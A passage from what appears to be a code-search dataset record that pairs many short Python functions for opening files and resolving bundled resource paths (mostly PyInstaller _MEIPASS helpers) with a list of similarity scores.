test_static_package_resource(self):\n resource = StaticResource('pyramid_webpack:jinja2ext.py')\n import pyramid_webpack.jinja2ext\n with resource.open() as i:\n self.assertEqual(i.read(),\n inspect.getsource(pyramid_webpack.jinja2ext))", "def file_to_open(self, title='Open file..', initial_folder=None, extension=\"All files (*.*)\", datafolder=None):\n pass", "def open_file(file_name):\n pass", "def open_file(self):\n if not self.loaded:\n self.load()\n\n # call a plugin action to perform the open action\n from cviewer.plugins.cff2.actions.actions import OpenFile", "def open (self, path, mode):\r\n pass", "def smart_open(filename, *args, **kwargs):\n return LOADERS.get(os.path.splitext(filename)[1], open)(filename, *args, **kwargs)", "def resource_path(relative_path):\n base_path= getattr(sys,'MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def open(self):", "def test_resource_path(self):\n\n # Without arguments\n resources_root_path = os.path.abspath(os.path.join(\n MY_DIRECTORY, '..', '..', 'resources'\n ))\n self.assertEqual(resources_root_path, paths.resource())", "def open(self, mode: str):\n return open(self.path, mode)", "def open(self) -> None:\n pass", "def open(self, mode='r'):\r\n return open(self.strpath, mode)", "def get_resource(self, rsc_path):\n\n\t\ttry:\n\t\t\tfrom pkg_resources import resource_filename\n\t\t\treturn resource_filename(__name__, rsc_path)\n\t\texcept ImportError:\n\t\t\treturn os.path.join(os.path.dirname(__file__), rsc_path)", "def open_file():\n filepath = filedialog.askopenfilename(initialdir = \"./\",title = \"Seleccionar archivo\",filetypes = ((\"xls files\",\"*.xls\"),(\"xlsx files\",\"*.xlsx\")))\n if not filepath:\n return\n\n window.title(filepath)\n lbl_url[\"text\"] = filepath\n btn_generate['state'] = 'normal'", "def open_app(self, event=None):\n if not self.ask_save():\n return\n default_path = os.path.dirname(common.root.filename or \"\") or self.cur_dir\n infile = wx.FileSelector(_(\"Open file\"),\n wildcard=\"wxGlade files (*.wxg)|*.wxg|wxGlade Template files (*.wgt)|*.wgt|\"\n \"XML files (*.xml)|*.xml|All files|*\",\n flags=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST, default_path=default_path)\n if not infile: return\n self._open(infile)", "def openInputFile(self):\r\n\r\n filename = self.ui.inputFilenameLineEdit.text()\r\n if not os.path.isfile(filename):\r\n QMessageBox.warning(self, \"Cannot open input file\", \"The input file does not exist\")\r\n return\r\n QDesktopServices.openUrl(QUrl.fromLocalFile(filename))", "def getResource(self, QQuickWindow, *__args): # real signature unknown; restored from __doc__ with multiple overloads\n pass", "def resource_path(self, resource):\n # type: (Text) -> Text\n # This deliberately raises FileNotFoundError instead of\n # NotImplementedError so that if this method is accidentally called,\n # it'll still do the right thing.\n raise FileNotFoundError", "def resourcePath(relative, dirname=\"data\"):\n # first look in pyinstaller bundle\n if hasattr(sys, \"_MEIPASS\"):\n path = os.path.join(sys._MEIPASS, dirname)\n \n else:\n # then look in py2app bundle\n path = os.environ.get(\"RESOURCEPATH\", None)\n if path is None:\n # then look in source code directory\n path = os.path.join(RESOURCE_BASE, dirname)\n \n path = os.path.join(path, relative)\n \n return path", "def _open(self, mode=b'r'):\n return self.opener(self.filename, mode=mode)", "def resource_path(relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\t# \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n\t# base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n\t# return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\r\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\r\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n # base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n # return os.path.join(base_path, relative_path)\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), relative_path)", "def open_file(path, config):\n\n return fopen(normalize_path(path, config))", "def getFile(filename):\n filename = os.path.join(os.path.dirname(__file__), filename)\n return open(filename, 'r')", "def getFile(filename):\n filename = os.path.join(os.path.dirname(__file__), filename)\n return open(filename, 'r')", "def OpenReadMe():\n location = os.path.join(os.path.dirname(__file__), \"README.txt\")\n os.startfile(location)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_show(resource_id, extra_args=None, cibfile=None):\n return item_show(\n item=\"resource\", item_id=resource_id, extra_args=extra_args, cibfile=cibfile\n )", "def __init__(self, resource):\n if resource:\n self.__resource = str(os.path.realpath(str(resource)));\n else:\n self.__resource = '';", "def openFile(self):\r\n from SXM import FileIO,Data\r\n fname = str(QFileDialog.getOpenFileName(self.widget,self.tr(\"Open File\"), \\\r\n \".\",FileIO.getFilterString(types=(Data.Image,))))\r\n if len(fname) > 0:\r\n root, ext = os.path.splitext(fname)\r\n self.statusBar().showMessage(self.tr(\"Loading data: %1\").arg(fname),2000)\r\n image = FileIO.fromFile(fname)\r\n image.load()\r\n imwin = ImageWindow(self,image)\r\n self.Images.append(imwin)\r\n self.updateImageList()\r\n imwin.windowModality = False\r\n imwin.show()", "def get_recipe_resource():\n return os.getenv(\"DKU_CUSTOM_RESOURCE_FOLDER\")", "def open_file(path):\n if platform.system() == \"Windows\":\n os.startfile(path)\n elif platform.system() == \"Darwin\":\n subprocess.Popen([\"open\", path])\n else:\n subprocess.Popen([\"xdg-open\", path])", "def resource_path(self, relative_path):\r\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\r\n return os.path.join(base_path, relative_path)", "def resource_path(self,relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\\\\Visual_Ressources\\\\\"+self.language+\"\\\\\") \n # \".\"\n # 'Content\\\\Back_End\\\\'\n return os.path.join(base_path, relative_path)", "def __init__(self, resource_path):\n self.resource_path = resource_path", "def open_file(self):\n filepath = askopenfilename(filetypes=[(\"Image Files\", (\"*.jpg\", \"*.png\")), (\"All Files\", \"*.*\")])\n if not filepath:\n return\n return filepath", "def __init__(self, basedir=None):\n # ------------------------------------------------------------------------\n super(Resources, self).__init__()\n self.xInitialize(basedir or \"resources\")", "def get_recipe_resource():\n return os.getenv(\"SKU_CUSTOM_RECIPE_RESOURCE_FOLDER\")", "def open_script(script_path):\n pass", "def resource_string(self, path):\n\t\tdata = pkg_resources.resource_string(__name__, path)\n\t\treturn data.decode(\"utf8\")", "def start_file(filename):\n from spyderlib.qt.QtGui import QDesktopServices\n from spyderlib.qt.QtCore import QUrl\n\n # We need to use setUrl instead of setPath because this is the only\n # cross-platform way to open external files. setPath fails completely on\n # Mac and doesn't open non-ascii files on Linux.\n # Fixes Issue 740\n url = QUrl()\n url.setUrl(filename)\n return QDesktopServices.openUrl(url)", "def open_file(filename, mode='rb'):\n path = os.path.join('fixtures', filename)\n if 'tests' in os.listdir('.'):\n path = os.path.join('tests', path)\n return open(path, mode=mode)", "def open_jpi_source_read(file_name):\n\t# change directory\n\tra_to_jpid()\n\t# open the file\n\tsource = open(file_name, \"r\")\n\t# return to starting direcotyr\n\tjpid_to_ra()\n\t# return the open file\n\treturn source", "def resource_path(relative_path) :\n\n try :\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except :\n base_path = os.path.abspath(\".\")\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n path = os.path.join(base_path, relative_path)\n return path", "def open(self):\n raise NotImplementedError", "def open(self):\n raise NotImplementedError", "def read(resource, package='loopslib.resources', **kwargs):\n result = dict()\n f = resources.open_text(package=package, resource=resource)\n\n # This addresses an issue where dealing with a python 'str' type fails\n # yaml.constructor.ConstructorError: could not determine a constructor for the\n # tag 'tag:yaml.org,2002:python/name:builtins.str'\n if resource == 'arguments.yaml':\n result = yaml.load(f, Loader=yaml.Loader)\n else:\n result = yaml.safe_load(f)\n\n f.close()\n\n LOG.debug('Read resource file {package}/{resource}'.format(package=package.replace('.', '/'), resource=resource))\n\n return result" ]
[ "0.7365257", "0.73252803", "0.67678213", "0.6268737", "0.61023885", "0.60719913", "0.6015069", "0.59758013", "0.5959422", "0.59363925", "0.5917066", "0.5907269", "0.59051013", "0.5904808", "0.58840156", "0.5865891", "0.5858449", "0.58112895", "0.5795447", "0.5792268", "0.5791022", "0.5787568", "0.5750105", "0.57261926", "0.5709553", "0.57030255", "0.56809735", "0.5621488", "0.5621488", "0.5621488", "0.56075656", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56007546", "0.55962825", "0.5589403", "0.55559903", "0.5551328", "0.5550957", "0.5539461", "0.5539461", "0.55270374", "0.55246097", "0.5513168", "0.55088806", "0.5486922", "0.5486334", "0.54716927", "0.5467547", "0.54553264", "0.54508674", "0.54498434", "0.5446999", "0.5442967", "0.5442753", "0.5422208", "0.54085463", "0.54032004", "0.5397368", "0.5395845", "0.53754425", "0.5372919", "0.5370937", "0.5359869", "0.53588635", "0.53447443", "0.5336905", "0.5336905", "0.53325504", "0.5332529", "0.5332529", "0.5332529", "0.5332529", "0.5332529", "0.53217816", "0.5319944", "0.53168356", "0.53046757", "0.5291121", "0.528795", "0.5278879", "0.5273897", "0.52709365", "0.5270187", "0.5263022", "0.5262923", "0.526268", "0.525975", "0.5256857", "0.52554065", "0.52488905", "0.5244738", "0.52375525", "0.52375525", "0.5230388" ]
0.6912169
2
A decorator that is used to register a view function for a
def route(self, rule, **options): def decorator(f): self.add_url_rule(rule, f.__name__, **options) # 添加路由规则 self.view_functions[f.__name__] = f # 更新 视图函数集合, 前面定义,{} return f return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_view( *args, **kwargs ):", "def decorate(func):\n from aha.dispatch.router import get_router\n r = get_router()\n r.connect(None, path, controller = func, **params)\n return func", "def decorator(self, decorator: Route.Decorator):\n pass", "def _wrapped_view(request, *args, **kwargs):\n return view_func(request, *args, **kwargs)", "def user_view_for(anon_view_func):\n\tdef decorator(view):\n\t\tanon_view_func.user_func = view\n\t\treturn view\n\treturn decorator", "def view(self, **options: Any) -> Callable:\n\n def decorator(f):\n rule = \"/\"\n endpoint = options.pop(\"endpoint\", f.__name__)\n self.add_url_rule(rule, endpoint, f, **options)\n return f\n\n return decorator", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def decorator(request, *dargs, **dkwargs):\n _set_language_by_user(request)\n return view_func(request, *dargs, **dkwargs)", "def view(*args, **kwargs):\n return mapped_method()", "def route(self, route: str) -> Callable:\n\n def decorator(f: Callable) -> Callable:\n \"\"\"Decorates the function.\"\"\"\n self.routes[route] = f\n\n return f\n\n return decorator", "def register_view(self, viewfunc, url_rule=None) :\n\n\t\tviewid = View.parse_id(viewfunc, self.settings.VIEW_ROOT)\n\t\t\n\t\tif viewid not in self.views :\n\t\t\t# Add view if not exists\n\t\t\tv = View(\n\t\t\t\tid = viewid,\n\t\t\t\tviewfunc = viewfunc,\n\t\t\t\turl_rule = url_rule,\n\t\t\t)\n\t\t\tself.views[viewid] = v\n\n\t\telse :\n\t\t\t# Update view if exists\n\t\t\tv = self.views[viewid]\n\t\t\tv.viewfunc = viewfunc\n\n\t\t\tif url_rule is not None :\n\t\t\t\tv.url_rule = url_rule\n\n\t\treturn v", "def expose(path=None, **kw):\n def decorate(function):\n endpoint = function.__name__\n kw.setdefault('endpoint', endpoint)\n view_map[endpoint] = function\n # Introspect rule path from function name and arguments.\n if path is None:\n inferred_path = '/' + function.__name__.replace('_', '/')\n args, _, _, defaults = inspect.getargspec(function)\n if args:\n if defaults:\n args = args[:-len(defaults)]\n inferred_path += '/<' + '>/<'.join(args) + '>'\n else:\n inferred_path = path\n rule = Rule(inferred_path, **kw)\n url_map.add(rule)\n function._routing_rule = rule\n return function\n\n if callable(path):\n # decorate() assumes \"path\" is a string or None, we set it to the\n # latter to force auto-pathing.\n function = path\n path = None\n decorator = decorate(function)\n decorator.__name__ = function.__name__\n return decorator\n\n return decorate", "def register(self, *args):\n def decorate(f):\n if not len(args) == 1:\n full = f.__name__\n else:\n full = args[0]\n\n # Gather some informations about the arguments of the function, to\n # display them in help() and check for the min / max number of\n # arguments on call.\n spec = inspect.getargspec(f)\n fargs = spec.args if spec.args else []\n nbr_args = len(fargs)\n nbr_filled = len(spec.defaults) if spec.defaults else 0\n reqs = fargs[:nbr_args-nbr_filled+1]\n adds = fargs[nbr_args-nbr_filled+1:]\n\n info = {\n 'function' : f,\n 'required' : reqs,\n 'additional': adds,\n }\n\n self.actions[full] = info\n return f\n return decorate", "def register(self, *t):\n\n if isinstance(t, (list, tuple)):\n if len(t) == 1:\n\n def func(view):\n self.register(t[0], view)\n return view\n\n return func\n\n t = url(*t)\n\n self.append(t)", "def register_view(cls, app):\n view = cls.as_view(cls.endpoint)\n\n all_methods = set(cls.methods)\n if cls.rules is None:\n raise ValueError('No rules found for %r' % (cls, ))\n for rule, methods in cls.rules.items():\n rule_methods = set(methods) & all_methods\n if rule_methods:\n app.add_url_rule(rule=rule, view_func=view, methods=rule_methods)", "def custom_view_field(*args, **kwargs):\n\n def decorated_func(func):\n @wraps(func)\n def wrapper(*func_args, **func_kwargs):\n return func(*func_args, **func_kwargs)\n\n for k, v in kwargs.items():\n setattr(wrapper, k, v)\n return wrapper\n\n return decorated_func", "def register(app, fn):\n\n @functools.wraps(fn)\n def config_route(**kwargs):\n \"\"\"\n :param kwargs: str, id of existing entry\n :return: dict or exception\n \"\"\"\n\n return fn(app.config, **kwargs)\n\n app.route(*fn.route_args, **fn.route_kwargs)(config_route)", "def decorator(hookable: Union[Route, Callable]):\n nonlocal hook_function\n full_hook_function = hook_function\n\n async def hook_function(req, res, params):\n return await call_async(\n full_hook_function, req, res, params, *args, **kwargs\n )\n\n if isinstance(hookable, Route):\n route = hookable\n route.hooks[hook] = hook_function\n return route\n else:\n view: Callable = hookable\n\n @wraps(view)\n async def with_hook(self, req, res, **kw):\n if hook == BEFORE:\n await hook_function(req, res, kw)\n await call_async(view, self, req, res, **kw)\n if hook == AFTER:\n await hook_function(req, res, kw)\n\n return with_hook", "def delegate(func):\n @functools.wraps(func)\n def wrapped(self, *args, **kwargs):\n path = args[0]\n handler = self.router.match(func.__name__, path)\n return handler(*args, **kwargs)\n return wrapped", "def decorator():\n return _decorator", "def route(cls, url, method='GET'):\n def route_decorator(func):\n item = (url, method, func)\n cls._docoratedRouteHandlers.append(item)\n return func\n return route_decorator", "def decorator(func):\n\n pass", "def decorator(func):\n\t\treturn push_aspect(name or func.__name__, func)", "def wrapped(func):\n self.routes.append((path, {\n 'regex': re.compile('^' + re.sub(self._part_matcher,'(.*?)',path) + '$'),\n 'function':func,\n 'reqs':req,\n 'kwargs':kwargs,\n 'parts':parts_info,\n 'generate':generate\n }))\n\n return func", "def decorate(func, *args, **kws):\n def do_authenticate():\n \"\"\"\n A function to perform authentication\n every time decorated function is called.\n \"\"\"\n #try:\n if 1:\n if 'referer' not in self.session:\n path = urlsplit(self.request.url)[2]\n self.session['referer'] = path\n self.session.put()\n #except:\n # pass\n aobj = self.config.auth_obj()\n self.get_controller()\n auth_res = aobj.auth(self.controller, *args, **kws)\n if auth_res:\n return func(*args, **kws)\n aobj.auth_redirect(self.controller, *args, **kws)\n # clear controller for development environment.\n\n return do_authenticate", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def route(self, path, **params):\n\n def decorate(func):\n \"\"\"\n A function returned as a object in load time,\n which set route to given url along with decorated function.\n \"\"\"\n from aha.dispatch.router import get_router\n r = get_router()\n r.connect(None, path, controller = func, **params)\n return func\n \n return decorate", "def decorator_register(func, name=None):\n self.register_command(func, name, description, show_if, args_opts)\n\n def func_wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return func_wrapper", "def setup_view(view, request=None, *args, **kwargs):\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def _register_view(self, app, resource, *urls, **kwargs):\n endpoint = kwargs.pop('endpoint', None) or resource.__name__.lower()\n self.endpoints.add(endpoint)\n\n if endpoint in getattr(app, 'view_class', {}):\n existing_view_class = app.view_functions[endpoint].__dict__['view_class']\n\n # if you override the endpoint with a different class, avoid the collision by raising an exception\n if existing_view_class != resource:\n raise ValueError('Endpoint {!r} is already set to {!r}.'\n .format(endpoint, existing_view_class.__name__))\n\n if not hasattr(resource, 'endpoint'): # Don't replace existing endpoint\n resource.endpoint = endpoint\n resource_func = self.output(resource.as_view(endpoint))\n\n for decorator in chain(kwargs.pop('decorators', ()), self.decorators):\n resource_func = decorator(resource_func)\n\n for url in urls:\n rule = self._make_url(url, self.blueprint.url_prefix if self.blueprint else None)\n\n # If this Api has a blueprint\n if self.blueprint:\n # And this Api has been setup\n if self.blueprint_setup:\n # Set the rule to a string directly, as the blueprint\n # is already set up.\n self.blueprint_setup.add_url_rule(self._make_url(url, None), view_func=resource_func, **kwargs)\n continue\n else:\n # Set the rule to a function that expects the blueprint\n # prefix to construct the final url. Allows deferment\n # of url finalization in the case that the Blueprint\n # has not yet been registered to an application, so we\n # can wait for the registration prefix\n rule = partial(self._make_url, url)\n else:\n # If we've got no Blueprint, just build a url with no prefix\n rule = self._make_url(url, None)\n # Add the url to the application or blueprint\n app.add_url_rule(rule, view_func=resource_func, **kwargs)", "def route_multiplexer(methods_to_viewfunc):\n def multiplexer():\n viewfunc = methods_to_viewfunc.get(request.method)\n if not viewfunc:\n raise Exception(\"No viewfunc found somehow?\")\n return viewfunc()\n multiplexer.methods_to_viewfunc = methods_to_viewfunc\n return multiplexer", "def view(self, request, decorator=None):\n if decorator is None:\n decorator = self.actions(self.mock_model, [\"doit\"])\n\n @decorator\n def view(req):\n response = HttpResponse()\n response.request = req\n return response\n\n return view(request)", "def get_viewfunc(self):\n # Generate some common middlewares\n if self.user_auth is not False:\n self.middlewares.append(UserAuthMiddleware(self.user_auth))\n\n if self.client_auth is not False:\n self.middlewares.append(ClientAuthMiddleware())\n\n if self.arguments:\n self.middlewares.append(ArgumentMiddleware(self.arguments))\n\n if self.paged:\n self.middlewares.append(PagingMiddleware())\n\n # Return the viewfunc, wrapped with requested middlewares\n return generate_viewfunc(self.viewfunc, self.middlewares)", "def as_view(cls):\n \n @csrf_exempt\n @slack_augment\n def view(request):\n return cls(request).dispatch()\n return view", "def route(self, path: str, **args: t.Any) -> t.Callable:\n def decorator(f: t.Callable) -> None:\n RouteMap.add_route(Route(path, f, args.get('methods', ['GET'])))\n return decorator", "def inject(self, request: BaseRequest, args_view: list, kwargs_view: dict):", "def view(cls):\n @wraps(cls)\n def wrapper(request, **kwargs):\n if hasattr(cls, 'as_view'):\n return cls.as_view()(request, **kwargs)\n obj = cls(request, **kwargs)\n handler = getattr(obj, request.method.lower(), None)\n if handler is None:\n return HttpResponseNotAllowed('%s not allowed' % request.method)\n res = obj.setup(obj.c) or handler(obj.c) or obj.render(obj.c)\n if isinstance(res, (dict, list)):\n return JsonResponse(res, safe=False)\n return res\n return wrapper", "def route(self, command):\n\n def _route(func):\n self._command_hash_views[command] = func\n\n def __route(*args, **kwargs):\n return func(*args, **kwargs)\n\n return __route\n\n return _route", "def device(view):\n def _decorator(request, *args, **kwargs):\n if not hasattr(request, \"device\"):\n m = DeviceMiddleware()\n m.process_request(request)\n return view(request, *args, **kwargs)\n\n _decorator.__doc__ = view.__doc__\n _decorator.__name__ = view.__name__\n\n return _decorator", "def setup_view(view, request, *args, **kwargs):\n\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def setup_view(self, view, request, *args, **kwargs):\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def req_as_decorator(req_output, *args, **kwargs):\r\n return req_output(dummy_func)(*args, **kwargs)", "def render_view(self, h, *args):\n return self.view(h)", "def decorator(view_func):\n @wraps(view_func, assigned=available_attrs(view_func))\n def _wrapped_view(request, *args, **kwargs):\n if request.auth_manager.has_privilege(privilege):\n return view_func(request, *args, **kwargs)\n else:\n raise InsufficientPrivilegesException(required_privileges=[privilege])\n\n return _wrapped_view", "def class_based_view_decorator(decorator):\n def _dec(cls):\n assert (isinstance(cls, type) and issubclass(cls, View)), (\n \"Only subclasses of django.views.generic.View may use this decorator.\"\n )\n _method_decorator = method_decorator(decorator)\n cls.dispatch = _method_decorator(cls.dispatch)\n return cls\n\n update_wrapper(_dec, decorator, assigned=available_attrs(decorator))\n return _dec", "def add_view(self, *args, **kwargs):\n return self._resources_manager.add_view(*args, **kwargs)", "def class_based_view(class_obj):\n def _instantiate_view_class(request, *args, **kwargs):\n return class_obj()(request, *args, **kwargs)\n return _instantiate_view_class", "def __call__(request):", "def process_view(self, request, view_func, view_args, view_kwargs):\n\n # Get undecorated function for require_login decorator\n if (isinstance(view_func, _CheckLogin)):\n view_func = view_func.view_func\n\n func_name = '.'.join((view_func.__module__, view_func.func_name))\n func_args = [','.join(view_args)]\n if func_args[0]:\n func_args.append(', ')\n func_args.append(','.join(\n [\"%s=%s\"%(k, v) for k, v in view_kwargs.items()]))\n LogDB(event_type='HR',\n info=\"Request to %s proceed by %s (%s)\"%(request.path,\n func_name, ''.join(func_args))\n ).save()\n return None", "def register(name, func, response_type, args=None, kwargs=None,\n cache_timeout=0, permission_func=grant_access):\n if not issubclass(response_type, BaseResponse):\n raise ValueError('Response type must be '\n 'one of the subclasses of '\n 'djangonumerics.responses.BaseResponse')\n if not args:\n args = []\n if not kwargs:\n kwargs = {}\n\n salt = settings.DJANGO_NUMERICS_SALT\n api_hash = hashlib.md5(str((name, salt)).encode()).hexdigest()\n endpoint = EndPoint(name=name,\n code=api_hash,\n func=func,\n args=args,\n kwargs=kwargs,\n response_type=response_type,\n cache_timeout=cache_timeout,\n permission_func=permission_func)\n if(api_hash in _CODE_ENDPOINT_MAP):\n logger.warn('Endpoint %s is already registered to numerics', name)\n else:\n _CODE_ENDPOINT_MAP[api_hash] = endpoint\n _NAME_ENDPOINT_MAP[name] = endpoint", "def api_key_required(func):\n\t@wraps(func)\n\tdef decorated_view(*args, **kwargs):\n\t\treturn func(*args,**kwargs)\n\treturn decorated_view", "def register(self):\n # self.register_route(\"GET\", self.__route, lambda req, res: self.status(req, res))\n self.register_route(\"GET\", self.__route, None, self.status)", "def with_template(arg):\n\n class TheWrapper(object):\n def __init__(self, default_template_name):\n self.default_template_name = default_template_name\n\n def __call__(self, func):\n def decorated_func(request, *args, **kwargs):\n ret = func(request, *args, **kwargs)\n if isinstance(ret, HttpResponse):\n return ret\n return TemplateResponse(request, ret.get(\n 'template_name', self.default_template_name), ret)\n\n update_wrapper(decorated_func, func)\n return decorated_func\n\n if not callable(arg):\n return TheWrapper(arg)\n else:\n app_name = re.search('([^.]+)[.]views', arg.__module__).group(1)\n default_template_name = ''.join([app_name, '/', arg.__name__, '.html'])\n return TheWrapper(default_template_name)(arg)", "def as_view(cls, *class_args, **class_kwargs):\n def view(*args, **kwargs):\n self = view.view_class(*class_args, **class_kwargs)\n return self.dispatch_request(*args, **kwargs)\n\n if cls.decorators:\n view.__module__ = cls.__module__\n for decorator in cls.decorators:\n view = decorator(view)\n\n view.view_class = cls\n view.__doc__ = cls.__doc__\n view.__module__ = cls.__module__\n return view", "def view_func(request, *args, **kwargs):\n method = request.GET.get('_method', request.method).upper()\n \n handler = method_table.get(method, None)\n if not handler:\n return HttpResponseNotAllowed(method_table.keys())\n\n return handler( request, *args, **kwargs)", "def register_to_blueprint(blueprint, route, methods_to_apifunc):\n methods_to_viewfunc = {}\n for method in methods_to_apifunc:\n methods_to_viewfunc[method] = methods_to_apifunc[method].get_viewfunc()\n\n if 'HEAD' not in methods_to_viewfunc and 'GET' in methods_to_viewfunc:\n methods_to_viewfunc['HEAD'] = methods_to_viewfunc['GET']\n\n blueprint.add_url_rule(\n \"/%s\" % route,\n endpoint=route,\n view_func=error_handler(route_multiplexer(methods_to_viewfunc)),\n methods=list(methods_to_viewfunc.keys()))", "def _map_intent_to_view_func(self, intent):\n if intent.name in self._intent_view_funcs:\n view_func = self._intent_view_funcs[intent.name]\n elif self._default_intent_view_func is not None:\n view_func = self._default_intent_view_func\n else:\n raise NotImplementedError('Intent \"{}\" not found and no default intent specified.'.format(intent.name))\n\n argspec = inspect.getfullargspec(view_func)\n arg_names = argspec.args\n arg_values = self._map_params_to_view_args(intent.name, arg_names)\n\n return partial(view_func, *arg_values)", "def register_create_view(self, blueprint):\n view = apply_decorators(self.create_view, self.create_decorators)\n blueprint.add_url_rule(\n self.create_rule, self.create_endpoint, view,\n methods=['GET', 'POST'])", "def get_decorated_function(self):", "def decorate(self, alias, *decorators):\n pfunc = getattr(self, alias)\n method, args, kargs = pfunc.func, pfunc.args, pfunc.keywords\n for decorator in decorators:\n method = decorator(method)\n self.register(alias, method, *args, **kargs)", "def decorator(func):\n self.subscribe(func, event, *events)\n return func", "def magic_route(self, rule, **options):\n\n def _decorator(f):\n endpoint = options.pop(\"endpoint\", f.__name__)\n if f not in self._injection_map:\n self._injection_map[f] = self._container.magic_partial(\n f, shared=self._request_singletons\n )\n self.blueprint.add_url_rule(\n rule, endpoint, self._injection_map[f], **options\n )\n return f\n\n return _decorator", "def cached_api(*args, **kwargs):\n def decorator(func):\n kwargs['request_gatekeeper'] = lambda request: not getattr(cached_view, 'never_cache', False)\n kwargs['response_gatekeeper'] = _response_gatekeeper\n\n def response_wrapper(ret):\n ret = loads(ret)\n ret['success'] = True\n ret = client_dumps(ret)\n return HttpResponse(ret, 'application/json')\n\n cache_func = cached_view(*args,\n cached_response_wrapper=response_wrapper,\n serializer=client_dumps,\n **kwargs)(func)\n cache_func.arg_spec = ArgSpec(func)\n\n return cache_func\n return decorator", "def response(status, response_def):\n def decorator(fn): # pylint: disable=missing-docstring\n meta = RouteMeta.load(fn)\n meta.set_response(status, response_def)\n meta.save()\n return fn\n return decorator", "def decorator(view_func):\n @wraps(view_func, assigned=available_attrs(view_func))\n def _wrapped_view(request, *args, **kwargs):\n dao = DataStreamDBDAO()\n query, total_resources = dao.query(account_id=request.account.id, language=request.user.language)\n if total_resources == 0 or request.GET.get('test-no-dataviews', False) == '1':\n raise AnyDatastreamRequiredException()\n return view_func(request, *args, **kwargs)\n\n return _wrapped_view", "def register(self, wsgi_app):\n wsgi_app.add_url_rule(\n rule=self.path,\n view_func=self.controller,\n methods=self.methods)", "def register_detail_view(self, blueprint):\n view = apply_decorators(self.detail_view, self.detail_decorators)\n blueprint.add_url_rule(self.detail_rule, self.detail_endpoint, view)", "def render_to(template_path):\n\n def decorator(func):\n def wrapper(request, *args, **kwargs):\n output = func(request, *args, **kwargs)\n if not isinstance(output, dict):\n return output\n ctx = RequestContext(request)\n return render_to_response(template_path, output,\n context_instance=ctx)\n return wrapper\n return decorator", "def register(self, *args):\n\n # Called as a decorator with no signature arguments so decorator needs\n # to use function annotations\n if len(args) == 0:\n return self._make_decorator()\n\n # If the last element is a valid @-syntax return value then we have a\n # decorator with signature arguments.\n if TypeCastSignature.is_return_element(args[-1]):\n return self._make_decorator(None, *args)\n\n # If we get here the function must have been called as a normal function\n # (not a decorator) so the last element must be the function to wrap.\n if not callable(args[-1]):\n raise ValueError(\n (\"Failed to register @-syntax function as {} is not \" \"callable\").format(args[-1])\n )\n if len(args) == 1:\n return self._make_decorator(None)(args[0])\n else:\n sigargs = args[:-1]\n return self._make_decorator(None, *sigargs)(args[-1])", "def wrapped_function(self, *args, **kwargs):\n if self.program is None:\n raise self.api_error(\n status_code=status.HTTP_404_NOT_FOUND,\n developer_message='no program exists with given key',\n error_code='program_does_not_exist'\n )\n return view_func(self, *args, **kwargs)", "def register_request_hydrator(self):\n\n # pylint: disable=missing-return-doc, missing-return-type-doc\n def decorator(func):\n self.request_hydrator_func = func\n return func\n\n return decorator", "def decorator(request, *dargs, **dkwargs):\n\n country_slug = dkwargs.get('country', '') or None\n _set_default_language_by_country(request, country_slug)\n return view_func(request, *dargs, **dkwargs)", "def view(path):\n def _decorator(func):\n @functools.wraps(func)\n def _wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n if isinstance(result, dict):\n logging.info('Return template.')\n return Template(path, **result)\n raise ValueError('Expect return a dict when using @view() decorator.')\n return _wrapper\n return _decorator", "def track_model_views(model):\n def func_wrap(django_view):\n def decorated(*args, **kwargs):\n request = args[1]\n model_id = kwargs.get('identifier')\n view_count = _increment_viewcount(model, model_id, request)\n return django_view(*args, **kwargs, view_count=view_count)\n return decorated\n return func_wrap", "def 